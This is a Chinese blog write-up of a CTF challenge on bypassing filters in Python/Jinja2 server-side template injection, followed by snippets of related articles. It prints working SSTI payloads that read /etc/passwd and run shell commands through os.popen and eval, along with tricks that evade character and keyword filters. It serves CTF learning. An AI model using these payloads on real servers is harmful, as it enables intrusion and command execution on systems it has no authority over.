xmctf web11-考核(模板注入绕过)

最新推荐文章于 2025-07-22 19:29:13 发布
原创 最新推荐文章于 2025-07-22 19:29:13 发布 · 993 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了模板注入攻击,一种常见的Web应用安全漏洞。通过分析实际案例,详细讲解了如何利用模板注入读取敏感文件,如/etc/passwd,并介绍了如何绕过过滤机制,使用getattr、attr等方法执行命令。此外,文章还提供了利用base64编码绕过限制获取flag的技巧。

web11-考核(模板注入绕过)

输入name=1发现存在回显,猜测为模板注入,经过测试发现过滤了 . _ 和一些关键字
py2模板注入常见payload
().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' )
过滤了.可以用getattr或者attr绕过
例如 ''.__class__可以写成 getattr('',"__class__")或者 ''|attr("__class__")
过滤了_可以用dir(0)[0][0]或者request['args']或者 request['values']绕过
因为还过滤了 args所以我们用request['values']和attr结合绕过
例如''.__class__写成 ''|attr(request['values']['x1']),然后post传入x1=__class__
最终payload?name={ { ()|attr(

最低0.47元/天 解锁文章
yu22x
关注
SSTI模板注入绕过(进阶篇)
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)
你们de4月天的博客
03-28 2483
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
六、SSTI模板注入绕过
黑日里不灭的light
10-20 549
解释:SSTI(Server-Side Template Injection)是一种在服务器端模板注入恶意代码的攻击技术。它利用了模板引擎的漏洞,使攻击者能够将恶意代码插入到模板中,在服务器端执行这些代码,例如python的flask就存在容易出现这个问题。危害:代码执行:攻击者可以通过SSTI注入在服务器端执行任意代码,包括命令执行、远程文件包含等攻击。这可能导致服务器被完全控制,进一步导致数据泄漏、服务器崩溃或恶意操作。
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 693
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
jinja2模板注入_Flask/Jinja2模板注入中的一些绕过姿势
weixin_36329818的博客
01-17 447
转自 https://p0sec.net/index.php/archives/120/好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2...
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 5051
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
网络安全最新SSTI模板注入详细总结及WAF绕过_fenjing ssti(1),网络安全最新面试题及答案
2401_84545016的博客
05-10 3790
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
xmctf web4-考核
羽的博客
07-07 1439
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 9209
1 注入原理 Flask 是python语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
绕过过滤的CTF命令注入实战
最新发布
z20201213的博客
07-22 286
拿到flag文件名,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资料得知,空格可以用$*在shell命令执行下为空,接下来查找 flag_is_here ,尝试发现很多字符被过滤了。url编码中,%0a是换行符,%0d是回车符,可以用这两个进行命令拼接。被过滤了,改用换行符。我这里使用Hex编码查看,查看源代码找到flag。先查找目录,发现不行。
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1502
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
模板注入总结(SSTI)
qq_44657899的博客
02-14 5896
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
SSTI模板注入绕过
2302_81650222的博客
02-28 1063
想要回显内容在外面加个print。
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 4000
ssti注入
CTF模板注入
weixin_43952190的博客
07-30 4359
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 1093
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF之路:关于Flask模板注入
zw05011的博客
01-07 6241
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF之服务器端模板注入(SSTI)与赛题
Neolock的博客
07-19 1118
服务端模板注入(SSTI)漏洞是由于开发人员将用户输入直接拼接到模板中执行导致的。以Flask框架的Jinja2模板为例,攻击者可通过{{}}语法注入恶意代码。利用魔术方法如__class__、__bases__等可进行沙箱逃逸,最终通过找到包含__builtins__的可利用类(如warnings.catch_warnings)执行系统命令。CTF案例展示了如何逐步利用这些方法获取环境变量中的flag。关键点包括:判断模板引擎类型、回溯类继承关系、绕过字符过滤、最终执行任意命令获取敏感信息。
CTF-SSTI模板注入
2302_78903258的博客
07-22 2510
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 6803
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值